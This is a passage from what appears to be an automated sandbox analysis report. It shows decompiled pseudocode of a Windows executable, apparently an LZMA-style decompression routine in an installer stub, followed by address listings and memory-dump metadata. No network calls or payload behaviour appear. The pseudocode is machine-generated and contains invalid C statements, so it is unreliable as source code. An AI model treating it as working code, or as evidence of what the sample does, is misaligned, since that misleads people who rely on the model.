                                                										case 0x17:
                                                											while(1) {
                                                												L145:
                                                												 *(_t644 - 0x50) = 1;
                                                												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                												goto L149;
                                                											}
                                                										case 0x18:
                                                											goto L146;
                                                										case 0x19:
                                                											L94:
                                                											__eflags = __ebx - 4;
                                                											if(__ebx < 4) {
                                                												L98:
                                                												 *(__ebp - 0x2c) = __ebx;
                                                												L119:
                                                												_t393 = __ebp - 0x2c;
                                                												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                												__eflags =  *_t393;
                                                												L120:
                                                												__eax =  *(__ebp - 0x2c);
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													L166:
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                													goto L170;
                                                												}
                                                												L121:
                                                												__eflags = __eax -  *(__ebp - 0x60);
                                                												if(__eax >  *(__ebp - 0x60)) {
                                                													goto L171;
                                                												}
                                                												L122:
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                												__eax =  *(__ebp - 0x30);
                                                												_t400 = __ebp - 0x60;
                                                												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                												__eflags =  *_t400;
                                                												goto L123;
                                                											}
                                                											L95:
                                                											__ecx = __ebx;
                                                											__eax = __ebx;
                                                											__ecx = __ebx >> 1;
                                                											__eax = __ebx & 0x00000001;
                                                											__ecx = (__ebx >> 1) - 1;
                                                											__al = __al | 0x00000002;
                                                											__eax = (__ebx & 0x00000001) << __cl;
                                                											__eflags = __ebx - 0xe;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__ebx >= 0xe) {
                                                												L97:
                                                												__ebx = 0;
                                                												 *(__ebp - 0x48) = __ecx;
                                                												L102:
                                                												__eflags =  *(__ebp - 0x48);
                                                												if( *(__ebp - 0x48) <= 0) {
                                                													L107:
                                                													__eax = __eax + __ebx;
                                                													 *(__ebp - 0x40) = 4;
                                                													 *(__ebp - 0x2c) = __eax;
                                                													__eax =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 4) + 0x644;
                                                													__eflags = __eax;
                                                													L108:
                                                													__ebx = 0;
                                                													 *(__ebp - 0x58) = __eax;
                                                													 *(__ebp - 0x50) = 1;
                                                													 *(__ebp - 0x44) = 0;
                                                													 *(__ebp - 0x48) = 0;
                                                													L112:
                                                													__eax =  *(__ebp - 0x40);
                                                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                														L118:
                                                														_t391 = __ebp - 0x2c;
                                                														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                														__eflags =  *_t391;
                                                														goto L119;
                                                													}
                                                													L113:
                                                													__eax =  *(__ebp - 0x50);
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                													__eax =  *(__ebp - 0x58);
                                                													__esi = __edi + __eax;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__ax =  *__esi;
                                                													__ecx = __ax & 0x0000ffff;
                                                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                													__eflags =  *(__ebp - 0xc) - __edx;
                                                													if( *(__ebp - 0xc) >= __edx) {
                                                														__ecx = 0;
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                														__ecx = 1;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                														__ebx = 1;
                                                														__ecx =  *(__ebp - 0x48);
                                                														__ebx = 1 << __cl;
                                                														__ecx = 1 << __cl;
                                                														__ebx =  *(__ebp - 0x44);
                                                														__ebx =  *(__ebp - 0x44) | __ecx;
                                                														__cx = __ax;
                                                														__cx = __ax >> 5;
                                                														__eax = __eax - __ecx;
                                                														__edi = __edi + 1;
                                                														__eflags = __edi;
                                                														 *(__ebp - 0x44) = __ebx;
                                                														 *__esi = __ax;
                                                														 *(__ebp - 0x50) = __edi;
                                                													} else {
                                                														 *(__ebp - 0x10) = __edx;
                                                														0x800 = 0x800 - __ecx;
                                                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                														 *__esi = __dx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														L111:
                                                														_t368 = __ebp - 0x48;
                                                														 *_t368 =  *(__ebp - 0x48) + 1;
                                                														__eflags =  *_t368;
                                                														goto L112;
                                                													} else {
                                                														L117:
                                                														goto L109;
                                                													}
                                                												}
                                                												L103:
                                                												__ecx =  *(__ebp - 0xc);
                                                												__ebx = __ebx + __ebx;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                													__ecx =  *(__ebp - 0x10);
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                													__ebx = __ebx | 0x00000001;
                                                													__eflags = __ebx;
                                                													 *(__ebp - 0x44) = __ebx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													L101:
                                                													_t338 = __ebp - 0x48;
                                                													 *_t338 =  *(__ebp - 0x48) - 1;
                                                													__eflags =  *_t338;
                                                													goto L102;
                                                												} else {
                                                													L106:
                                                													goto L99;
                                                												}
                                                											}
                                                											L96:
                                                											__edx =  *(__ebp - 4);
                                                											__eax = __eax - __ebx;
                                                											 *(__ebp - 0x40) = __ecx;
                                                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                											goto L108;
                                                										case 0x1a:
                                                											L56:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												L162:
                                                												 *(__ebp - 0x88) = 0x1a;
                                                												goto L170;
                                                											}
                                                											L57:
                                                											__ecx =  *(__ebp - 0x68);
                                                											__al =  *(__ebp - 0x5c);
                                                											__edx =  *(__ebp - 8);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                											 *( *(__ebp - 0x68)) = __al;
                                                											__ecx =  *(__ebp - 0x14);
                                                											 *(__ecx +  *(__ebp - 8)) = __al;
                                                											__eax = __ecx + 1;
                                                											__edx = 0;
                                                											_t192 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t192;
                                                											goto L80;
                                                										case 0x1b:
                                                											L76:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												L163:
                                                												 *(__ebp - 0x88) = 0x1b;
                                                												goto L170;
                                                											}
                                                											L77:
                                                											__eax =  *(__ebp - 0x14);
                                                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                											__eflags = __eax -  *(__ebp - 0x74);
                                                											if(__eax >=  *(__ebp - 0x74)) {
                                                												__eax = __eax +  *(__ebp - 0x74);
                                                												__eflags = __eax;
                                                											}
                                                											__edx =  *(__ebp - 8);
                                                											__cl =  *(__eax + __edx);
                                                											__eax =  *(__ebp - 0x14);
                                                											 *(__ebp - 0x5c) = __cl;
                                                											 *(__eax + __edx) = __cl;
                                                											__eax = __eax + 1;
                                                											__edx = 0;
                                                											_t275 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t275;
                                                											__eax =  *(__ebp - 0x68);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											_t284 = __ebp - 0x64;
                                                											 *_t284 =  *(__ebp - 0x64) - 1;
                                                											__eflags =  *_t284;
                                                											 *( *(__ebp - 0x68)) = __cl;
                                                											L80:
                                                											 *(__ebp - 0x14) = __edx;
                                                											goto L81;
                                                										case 0x1c:
                                                											while(1) {
                                                												L123:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													break;
                                                												}
                                                												L124:
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__edx =  *(__ebp - 8);
                                                												__cl =  *(__eax + __edx);
                                                												__eax =  *(__ebp - 0x14);
                                                												 *(__ebp - 0x5c) = __cl;
                                                												 *(__eax + __edx) = __cl;
                                                												__eax = __eax + 1;
                                                												__edx = 0;
                                                												_t414 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t414;
                                                												__eax =  *(__ebp - 0x68);
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                												__eflags =  *(__ebp - 0x30);
                                                												 *( *(__ebp - 0x68)) = __cl;
                                                												 *(__ebp - 0x14) = _t414;
                                                												if( *(__ebp - 0x30) > 0) {
                                                													continue;
                                                												} else {
                                                													L127:
                                                													L81:
                                                													 *(__ebp - 0x88) = 2;
                                                													goto L1;
                                                												}
                                                											}
                                                											L167:
                                                											 *(__ebp - 0x88) = 0x1c;
                                                											goto L170;
                                                									}
                                                								}
                                                								L171:
                                                								_t539 = _t538 | 0xffffffff;
                                                								goto L172;
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}















                                                0x004062c6
                                                0x004062c9
                                                0x004062cc
                                                0x004062cf
                                                0x004062d2
                                                0x004062d5
                                                0x004062d8
                                                0x004062f4
                                                0x004062f7
                                                0x004062fa
                                                0x004062fd
                                                0x00406304
                                                0x00406308
                                                0x0040630a
                                                0x0040630e
                                                0x004062da
                                                0x004062da
                                                0x004062de
                                                0x004062e6
                                                0x004062eb
                                                0x004062ed
                                                0x004062ef
                                                0x004062ef
                                                0x00406311
                                                0x00406318
                                                0x0040631b
                                                0x00000000
                                                0x00406321
                                                0x00406321
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406326
                                                0x00406326
                                                0x0040632a
                                                0x004069ea
                                                0x004069ea
                                                0x00000000
                                                0x004069ea
                                                0x00406330
                                                0x00406330
                                                0x00406333
                                                0x00406336
                                                0x0040633a
                                                0x0040633d
                                                0x00406343
                                                0x00406345
                                                0x00406345
                                                0x00406345
                                                0x00406348
                                                0x0040634b
                                                0x0040634b
                                                0x0040634b
                                                0x00406351
                                                0x00000000
                                                0x00000000
                                                0x00406353
                                                0x00406353
                                                0x00406356
                                                0x00406359
                                                0x0040635c
                                                0x0040635f
                                                0x00406362
                                                0x00406365
                                                0x00406368
                                                0x0040636b
                                                0x0040636e
                                                0x00406371
                                                0x00406389
                                                0x0040638c
                                                0x0040638f
                                                0x00406392
                                                0x00406392
                                                0x00406395
                                                0x00406399
                                                0x0040639b
                                                0x00406373
                                                0x00406373
                                                0x0040637b
                                                0x00406380
                                                0x00406382
                                                0x00406384
                                                0x00406384
                                                0x0040639e
                                                0x004063a5
                                                0x004063a8
                                                0x00000000
                                                0x004063aa
                                                0x004063aa
                                                0x00000000
                                                0x004063aa
                                                0x004063a8
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x00000000
                                                0x00000000
                                                0x004063ea
                                                0x004063ea
                                                0x004063ee
                                                0x004069f6
                                                0x004069f6
                                                0x00000000
                                                0x004069f6
                                                0x004063f4
                                                0x004063f4
                                                0x004063f7
                                                0x004063fa
                                                0x004063fe
                                                0x00406401
                                                0x00406407
                                                0x00406409
                                                0x00406409
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x0040640f
                                                0x00406415
                                                0x004063b3
                                                0x004063b3
                                                0x004063b6
                                                0x00000000
                                                0x004063b6
                                                0x00406417
                                                0x00406417
                                                0x0040641a
                                                0x0040641d
                                                0x00406420
                                                0x00406423
                                                0x00406426
                                                0x00406429
                                                0x0040642c
                                                0x0040642f
                                                0x00406432
                                                0x00406435
                                                0x0040644d
                                                0x00406450
                                                0x00406453
                                                0x00406456
                                                0x00406456
                                                0x00406459
                                                0x0040645d
                                                0x0040645f
                                                0x00406437
                                                0x00406437
                                                0x0040643f
                                                0x00406444
                                                0x00406446
                                                0x00406448
                                                0x00406448
                                                0x00406462
                                                0x00406469
                                                0x0040646c
                                                0x00000000
                                                0x0040646e
                                                0x0040646e
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x004064cb
                                                0x004064cb
                                                0x004064ce
                                                0x00000000
                                                0x00000000
                                                0x0040680a
                                                0x0040680a
                                                0x0040680e
                                                0x00406830
                                                0x00406830
                                                0x00406833
                                                0x0040683d
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406810
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681a
                                                0x0040681d
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x004068fe
                                                0x004068fe
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00406912
                                                0x004068cd
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069b8
                                                0x004069bb
                                                0x004068bc
                                                0x004068bc
                                                0x004068bc
                                                0x00000000
                                                0x004068c2
                                                0x00000000
                                                0x004065f2
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406905
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00406912
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406637
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d0
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                0x00406789
                                                0x0040678c
                                                0x0040674e
                                                0x0040674e
                                                0x00406756
                                                0x0040675b
                                                0x0040675d
                                                0x00406760
                                                0x00406760
                                                0x0040678f
                                                0x00406796
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00000000
                                                0x00406798
                                                0x00406798
                                                0x00000000
                                                0x00406798
                                                0x00406796
                                                0x004066a9
                                                0x004066a9
                                                0x004066ac
                                                0x004066ae
                                                0x004066b1
                                                0x004066b4
                                                0x004066b7
                                                0x004066b9
                                                0x004066bc
                                                0x004066bf
                                                0x004066bf
                                                0x004066c2
                                                0x004066c2
                                                0x004066c5
                                                0x004066cc
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x00000000
                                                0x004066ce
                                                0x004066ce
                                                0x00000000
                                                0x004066ce
                                                0x004066cc
                                                0x00406652
                                                0x00406652
                                                0x00406655
                                                0x00406657
                                                0x0040665a
                                                0x00000000
                                                0x00000000
                                                0x004063b9
                                                0x004063b9
                                                0x004063bd
                                                0x00406a02
                                                0x00406a02
                                                0x00000000
                                                0x00406a02
                                                0x004063c3
                                                0x004063c3
                                                0x004063c6
                                                0x004063c9
                                                0x004063cc
                                                0x004063cf
                                                0x004063d2
                                                0x004063d5
                                                0x004063d7
                                                0x004063da
                                                0x004063dd
                                                0x004063e0
                                                0x004063e2
                                                0x004063e2
                                                0x004063e2
                                                0x00000000
                                                0x00000000
                                                0x00406544
                                                0x00406544
                                                0x00406548
                                                0x00406a0e
                                                0x00406a0e
                                                0x00000000
                                                0x00406a0e
                                                0x0040654e
                                                0x0040654e
                                                0x00406551
                                                0x00406554
                                                0x00406557
                                                0x00406559
                                                0x00406559
                                                0x00406559
                                                0x0040655c
                                                0x0040655f
                                                0x00406562
                                                0x00406565
                                                0x00406568
                                                0x0040656b
                                                0x0040656c
                                                0x0040656e
                                                0x0040656e
                                                0x0040656e
                                                0x00406571
                                                0x00406574
                                                0x00406577
                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x0040657d
                                                0x0040657f
                                                0x0040657f
                                                0x00000000
                                                0x00000000
                                                0x004067c1
                                                0x004067c1
                                                0x004067c1

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E0040680A() {
                                                				void _t533;
                                                				signed int _t534;
                                                				signed int _t535;
                                                				signed int* _t605;
                                                				void* _t612;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t612 - 0x40) != 0) {
                                                						 *(_t612 - 0x84) = 0x13;
                                                						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                						goto L132;
                                                					} else {
                                                						__eax =  *(__ebp - 0x4c);
                                                						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                						__ecx =  *(__ebp - 0x58);
                                                						__eax =  *(__ebp - 0x4c) << 4;
                                                						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                						L130:
                                                						 *(__ebp - 0x58) = __eax;
                                                						 *(__ebp - 0x40) = 3;
                                                						L144:
                                                						 *(__ebp - 0x7c) = 0x14;
                                                						L145:
                                                						__eax =  *(__ebp - 0x40);
                                                						 *(__ebp - 0x50) = 1;
                                                						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                						L149:
                                                						if( *(__ebp - 0x48) <= 0) {
                                                							__ecx =  *(__ebp - 0x40);
                                                							__ebx =  *(__ebp - 0x50);
                                                							0 = 1;
                                                							__eax = 1 << __cl;
                                                							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                							__eax =  *(__ebp - 0x7c);
                                                							 *(__ebp - 0x44) = __ebx;
                                                							while(1) {
                                                								L140:
                                                								 *(_t612 - 0x88) = _t533;
                                                								while(1) {
                                                									L1:
                                                									_t534 =  *(_t612 - 0x88);
                                                									if(_t534 > 0x1c) {
                                                										break;
                                                									}
                                                									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
                                                										case 0:
                                                											if( *(_t612 - 0x6c) == 0) {
                                                												goto L170;
                                                											}
                                                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                											_t534 =  *( *(_t612 - 0x70));
                                                											if(_t534 > 0xe1) {
                                                												goto L171;
                                                											}
                                                											_t538 = _t534 & 0x000000ff;
                                                											_push(0x2d);
                                                											asm("cdq");
                                                											_pop(_t569);
                                                											_push(9);
                                                											_pop(_t570);
                                                											_t608 = _t538 / _t569;
                                                											_t540 = _t538 % _t569 & 0x000000ff;
                                                											asm("cdq");
                                                											_t603 = _t540 % _t570 & 0x000000ff;
                                                											 *(_t612 - 0x3c) = _t603;
                                                											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                												L10:
                                                												if(_t611 == 0) {
                                                													L12:
                                                													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                													goto L15;
                                                												} else {
                                                													goto L11;
                                                												}
                                                												do {
                                                													L11:
                                                													_t611 = _t611 - 1;
                                                													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                												} while (_t611 != 0);
                                                												goto L12;
                                                											}
                                                											if( *(_t612 - 4) != 0) {
                                                												GlobalFree( *(_t612 - 4));
                                                											}
                                                											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                											 *(_t612 - 4) = _t534;
                                                											if(_t534 == 0) {
                                                												goto L171;
                                                											} else {
                                                												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                												goto L10;
                                                											}
                                                										case 1:
                                                											L13:
                                                											__eflags =  *(_t612 - 0x6c);
                                                											if( *(_t612 - 0x6c) == 0) {
                                                												 *(_t612 - 0x88) = 1;
                                                												goto L170;
                                                											}
                                                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                											_t45 = _t612 - 0x48;
                                                											 *_t45 =  *(_t612 - 0x48) + 1;
                                                											__eflags =  *_t45;
                                                											L15:
                                                											if( *(_t612 - 0x48) < 4) {
                                                												goto L13;
                                                											}
                                                											_t546 =  *(_t612 - 0x40);
                                                											if(_t546 ==  *(_t612 - 0x74)) {
                                                												L20:
                                                												 *(_t612 - 0x48) = 5;
                                                												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                												goto L23;
                                                											}
                                                											 *(_t612 - 0x74) = _t546;
                                                											if( *(_t612 - 8) != 0) {
                                                												GlobalFree( *(_t612 - 8)); // executed
                                                											}
                                                											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                											 *(_t612 - 8) = _t534;
                                                											if(_t534 == 0) {
                                                												goto L171;
                                                											} else {
                                                												goto L20;
                                                											}
                                                										case 2:
                                                											L24:
                                                											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                											 *(_t612 - 0x84) = 6;
                                                											 *(_t612 - 0x4c) = _t553;
                                                											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                											goto L132;
                                                										case 3:
                                                											L21:
                                                											__eflags =  *(_t612 - 0x6c);
                                                											if( *(_t612 - 0x6c) == 0) {
                                                												 *(_t612 - 0x88) = 3;
                                                												goto L170;
                                                											}
                                                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                											_t67 = _t612 - 0x70;
                                                											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                											__eflags =  *_t67;
                                                											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                											L23:
                                                											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                											if( *(_t612 - 0x48) != 0) {
                                                												goto L21;
                                                											}
                                                											goto L24;
                                                										case 4:
                                                											L133:
                                                											_t531 =  *_t605;
                                                											_t588 = _t531 & 0x0000ffff;
                                                											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                											if( *(_t612 - 0xc) >= _t564) {
                                                												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                												 *(_t612 - 0x40) = 1;
                                                												_t532 = _t531 - (_t531 >> 5);
                                                												__eflags = _t532;
                                                												 *_t605 = _t532;
                                                											} else {
                                                												 *(_t612 - 0x10) = _t564;
                                                												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                											}
                                                											if( *(_t612 - 0x10) >= 0x1000000) {
                                                												goto L139;
                                                											} else {
                                                												goto L137;
                                                											}
                                                										case 5:
                                                											L137:
                                                											if( *(_t612 - 0x6c) == 0) {
                                                												 *(_t612 - 0x88) = 5;
                                                												goto L170;
                                                											}
                                                											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                											L139:
                                                											_t533 =  *(_t612 - 0x84);
                                                											goto L140;
                                                										case 6:
                                                											__edx = 0;
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 4);
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) = 1;
                                                												 *(__ebp - 0x84) = 7;
                                                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                												goto L132;
                                                											}
                                                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                											__esi =  *(__ebp - 0x60);
                                                											__cl = 8;
                                                											__cl = 8 -  *(__ebp - 0x3c);
                                                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                											__ecx =  *(__ebp - 0x3c);
                                                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                											__ecx =  *(__ebp - 4);
                                                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                											__eflags =  *(__ebp - 0x38) - 4;
                                                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                											if( *(__ebp - 0x38) >= 4) {
